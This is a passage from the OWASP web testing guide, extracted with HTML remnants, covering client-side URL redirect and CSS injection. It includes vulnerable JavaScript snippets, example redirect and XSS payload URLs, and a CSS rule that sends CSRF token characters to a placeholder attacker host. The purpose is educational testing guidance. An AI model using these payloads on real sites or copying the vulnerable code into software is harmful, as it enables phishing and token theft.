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Web Application Penetration Testing<br />

Web Application Penetration Testing<br />

Whitepapers<br />

• Browser location/document URI/URL Sources - https://code.<br />

google.com/p/domxsswiki/wiki/LocationSources<br />

• i.e., what is returned when the user asks the browser for things like<br />

document.URL, document.baseURI, location, location.href, etc.<br />

Testing for Client Side URL Redirect<br />

(OTG-CLIENT-004)<br />

Summary<br />

This section describes how to check for Client Side URL Redirection,<br />

also known as Open Redirection. It is an input validation flaw that exists<br />

when an application accepts an user controlled input which specifies<br />

a link that leads to an external URL that could be malicious. This<br />

kind of vulnerability could be used to accomplish a phishing attack or<br />

redirect a victim to an infection page.<br />

How to Test<br />

This vulnerability occurs when an application accepts untrusted input<br />

that contains an URL value without sanitizing it. This URL value could<br />

cause the web application to redirect the user to another page as, for<br />

example, a malicious page controlled by the attacker.<br />

By modifying untrusted URL input to a malicious site, an attacker may<br />

successfully launch a phishing scam and steal user credentials. Since<br />

the redirection is originated by the real application, the phishing attempts<br />

may have a more trustworthy appearance.<br />

A phishing attack example could be the following:<br />

http:/www.target.site?#redirect=www.fake-target.site<br />

The victim that visits target.site will be automatically redirected to<br />

fake-target.site where an attacker could place a fake page to steal<br />

victim’s credentials.<br />

Moreover open redirections could also be used to maliciously craft an<br />

URL that would bypass the application’s access control checks and<br />

then forward the attacker to privileged functions that they would<br />

normally not be able to access.<br />

Black Box testing<br />

Black box testing for Client Side URL Redirect is not usually performed<br />

since access to the source code is always available as it needs to be<br />

sent to the client to be executed.<br />

Gray Box testing<br />

Testing for Client Side URL Redirect vulnerabilities:<br />

When testers have to manually check for this type of vulnerability<br />

they have to identify if there are client side redirections implemented<br />

in the client side code (for example in the JavaScript code).<br />

These redirections could be implemented, for example in JavaScript,<br />

using the “window.location” object that can be used to take the<br />

browser to another page by simply assigning a string to it. (as you can<br />

see in the following snippet of code).<br />

var redir = location.hash.substring(1);<br />

if (redir)<br />

window.location=’http:/’+decodeURIComponent(redir);<br />

In the previous example the script does not perform any validation<br />

of the variable “redir”, that contains the user supplied input via the<br />

query string, and in the same time does not apply any form of encoding,<br />

then this unvalidated input is passed to the windows.location<br />

object originating a URL redirection vulnerability.<br />

This implies that an attacker could redirect the victim to a malicious<br />

site simply by submitting the following query string:<br />

http:/www.victim.site/?#www.malicious.site<br />

Note how, if the vulnerable code is the following:<br />

var redir = location.hash.substring(1);<br />

if (redir)<br />

window.location=decodeURIComponent(redir);<br />

It also could be possible to inject JavaScript code, for example by submitting<br />

the following query string:<br />

http:/www.victim.site/?#javascript:alert(document.cookie)<br />

When trying to check for this kind of issues, consider that some<br />

characters are treated differently by different browsers.<br />

Moreover always consider the possibility to try absolute URLs<br />

variants as described here: http://kotowicz.net/absolute/<br />

Tools<br />

• DOMinator - https://dominator.mindedsecurity.com/<br />

References<br />

OWASP Resources<br />

• DOM based XSS Prevention Cheat Sheet<br />

• DOMXSS.com - http://www.domxss.com<br />

Whitepapers<br />

• Browser location/document URI/URL Sources - https://code.<br />

google.com/p/domxsswiki/wiki/LocationSources<br />

• i.e., what is returned when you ask the browser for things like<br />

document.URL, document.baseURI, location, location.href, etc.<br />

• Krzysztof Kotowicz: “Local or Externa? Weird URL formats on<br />

the loose” - http://kotowicz.net/absolute/<br />

Testing for CSS Injection (OTG-CLIENT-005)<br />

Summary<br />

A CSS Injection vulnerability involves the ability to inject arbitrary<br />

CSS code in the context of a trusted web site, and this will be rendered<br />

inside the victim’s browser. The impact of such a vulnerability<br />

may vary on the basis of the supplied CSS payload: it could<br />

lead to Cross-Site Scripting in particular circumstances, to data<br />

exfiltration in the sense of extracting sensitive data or to UI modifications.<br />

How to Test<br />

Such a vulnerability occurs when the application allows to supply<br />

user-generated CSS or it is possible to somehow interfere with the<br />

legit stylesheets. Injecting code in the CSS context gives the attacker<br />

the possibility to execute JavaScript in certain conditions as well as<br />

extracting sensitive values through CSS selectors and functions able<br />

to generate HTTP requests. Actually, giving the users the possibility<br />

to customize their own personal pages by using custom CSS files results<br />

in a considerable risk, and should be definitely avoided.<br />

The following JavaScript code shows a possible vulnerable script<br />

in which the attacker is able to control the “location.hash” (source)<br />

which reaches the “cssText” function (sink). This particular case may<br />

lead to DOMXSS in older browser versions, such as Opera, Internet<br />

Explorer and Firefox; for reference see DOM XSS Wiki, section “Style<br />

Sinks”.<br />

Click me<br />

<br />

if (location.hash.slice(1)) {<br />

document.getElementById(“a1”).style.cssText = “color: “ +<br />

location.hash.slice(1);<br />

}<br />

<br />

Specifically the attacker could target the victim by asking her to visit<br />

the following URLs:<br />

• www.victim.com/#red;-o-link:’javascript:alert(1)’;-o-linksource:current;<br />

(Opera [8,12])<br />

• www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)<br />

The same vulnerability may appear in the case of classical reflected<br />

XSS in which for instance the PHP code looks like the following:<br />

<br />

p {<br />

color: ;<br />

text-align: center;<br />

}<br />

<br />

Much more interesting attack scenarios involve the possibility to<br />

extract data through the adoption of pure CSS rules. Such attacks<br />

can be conducted through CSS selectors and leading for instance to<br />

grab anti-CSRF tokens, as follows. In particular, input[name=csrf_<br />

token][value=^a] represents an element with the attribute “name”<br />

set “csrf_token” and whose attribute “value” starts with “a”. By detecting<br />

the length of the attribute “value”, it is possible to carry out<br />

a brute force attack against it and send its value to the attacker’s<br />

domain.<br />

<br />

input[name=csrf_token][value=^a] {<br />

background-image: url(http:/attacker/log?a);<br />

}<br />

<br />

Much more modern attacks involving a combination of SVG, CSS and<br />

HTML5 have been proven feasible, therefore we recommend to see<br />

the References section for details.<br />

Black Box testing<br />

We are referring to client-side testing, therefore black box testing<br />

is not usually performed since access to the source code is always<br />

available as it needs to be sent to the client to be executed. However,<br />

it may happen that the user is given a certain degree of freedom in<br />

terms of possibilities to supply HTML code; in that case it is required<br />

to test whether no CSS injections are possible: tags like “link” and<br />

“style” should be disallowed, as well as attributes “style”.<br />

Gray Box testing<br />

Testing for CSS Injection vulnerabilities:<br />

Manual testing needs to be conducted and the JavaScript code analyzed<br />

in order to understand whether the attackers can inject its own<br />

content in CSS context. In particular we should be interested in how<br />

the website returns CSS rules on the basis of the inputs.<br />

The following is a basic example:<br />

Click me<br />

Hi<br />

<br />

$(“a”).click(function(){<br />

$(“b”).attr(“style”,”color: “ + location.hash.slice(1));<br />

});<br />

<br />

The above code contains a source “location.hash” that is controlled<br />

by the attacker that can inject directly in the attribute “style” of an<br />

HTML element. As mentioned above, this may lead to different results<br />

on the basis of the adopted browser and the supplied payload.<br />

It is recommended that testers use the jQuery function css(property,<br />

value) in such circumstances as follows, since this would disallow<br />

any damaging injections. In general, we recommend to use always a<br />

whitelist of allowed characters any time the input is reflected in the<br />

CSS context.<br />

Click me<br />

Hi<br />

<br />

$(“a”).click(function(){<br />

$(“b”).css(“color”,location.hash.slice(1));<br />

});<br />

<br />

References<br />

OWASP Resources<br />

• DOM based XSS Prevention Cheat Sheet<br />

• DOMXSS Wiki - https://code.google.com/p/domxsswiki/wiki/<br />

CssText<br />

Presentations<br />

• DOM Xss Identification and Exploitation, Stefano Di Paola - http://

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